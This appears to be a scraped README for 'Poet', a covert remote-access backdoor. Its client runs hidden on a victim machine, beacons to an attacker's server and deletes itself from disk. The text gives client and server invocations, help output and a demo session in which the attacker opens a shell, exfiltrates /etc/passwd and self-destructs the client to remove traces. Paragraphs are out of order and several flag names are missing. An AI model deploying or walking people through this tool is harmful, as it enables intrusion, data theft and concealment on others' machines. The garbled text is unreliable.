The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:

$ ./poet-client 1.2.3.4 10 # poet-client daemonizes, so there's nothing to see

Warning:

$ sudo ./poet-server _ ____ ____ ___ / /_ / __ \/ __ \/ _ \/ __/ / /_/ / /_/ / __/ / / .___/\____/\___/\__/ /_/ [+] (06/28/15 03:58:42) Dropping privileges to uid: 501, gid: 20 [+] (06/28/15 03:58:42) Poet server started (port 443) [+] (06/28/15 03:58:50) Connected By: ('127.0.0.1', 54494) -> VALID [+] (06/28/15 03:58:50) Entering control shell Welcome to posh, the Poet Shell! Running `help' will give you a list of supported commands. posh > help Commands: chint dlexec exec exfil exit help recon selfdestruct shell posh > shell posh > user@server $ uname -a Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux posh > user@server $ ^D posh > exfil /etc/passwd posh : exfil written to archive/20150628/exfil/passwd-201506285917.txt posh > ^D [+] (06/28/15 03:59:18) Exiting control shell [-] (06/28/15 03:59:18) Poet server terminated $ sudo ./poet-server _ ____ ____ ___ / /_ / __ \/ __ \/ _ \/ __/ / /_/ / /_/ / __/ / / .___/\____/\___/\__/ /_/ [+] (06/28/15 03:59:26) Dropping privileges to uid: 501, gid: 20 [+] (06/28/15 03:59:26) Poet server started (port 443) [+] (06/28/15 03:59:28) Connected By: ('127.0.0.1', 54542) -> VALID [+] (06/28/15 03:59:28) Entering control shell Welcome to posh, the Poet Shell! Running `help' will give you a list of supported commands. posh > selfdestruct [!] WARNING: You are about to permanently remove the client from the target. You will immediately lose access to the target. Continue? (y/n) y [+] (06/28/15 03:59:33) Exiting control shell [-] (06/28/15 03:59:33) Poet server terminated

Usage:

$ ./poet-client 127.0.0.1 1 --debug --no-selfdestruct

$ sudo ./poet-server

Client:

$ ./poet-client -h usage: poet-client [-h] [-p PORT] [--debug] [--no-daemon] [--no-selfdestruct] IP [INTERVAL] positional arguments: IP Poet Server INTERVAL Beacon Interval, in seconds. Default: 600 optional arguments: -h, --help show this help message and exit -p PORT, --port PORT --debug show debug messages. implies --no-daemon --no-daemon don't daemonize --no-selfdestruct don't selfdestruct

Server:

$ ./poet-server -h usage: poet-server [-h] [-p PORT] [-v] optional arguments: -h, --help show this help message and exit -p PORT, --port PORT -v, --version prints the Poet version number and exits

The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client. She does not have the server running at this point, but it's ok, the client waits patiently. Eventually, the attacker is ready and starts the server, first starting a shell and executing, then exfiltrating. Then she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server. Later, she connects again, self-destructing the client, removing all traces from the target.After running this command, you'll need to either run selfdestruct from the server, or kill the poet-client process to stop the client.Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily test it out, a typical invocation would look like:By default, the Poet client daemonizes and deletes itself from disk, so that behavior is suppressed using theandflags.By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omitand use theflag on both the client and server. Pick a nice, high number for your port (> 1024).Poet is a client/server application. The client is executed on the target and beacons back to the server at a certain time interval. The only required argument is the IP address where the server is or will be running. Following it can optionally be the time interval in seconds of how frequently to beacon back, which defaults to 10 minutes. The port for the client to beacon out on can be specified with theflag. All other flags would not be used during "real" usage and exist mainly for debugging.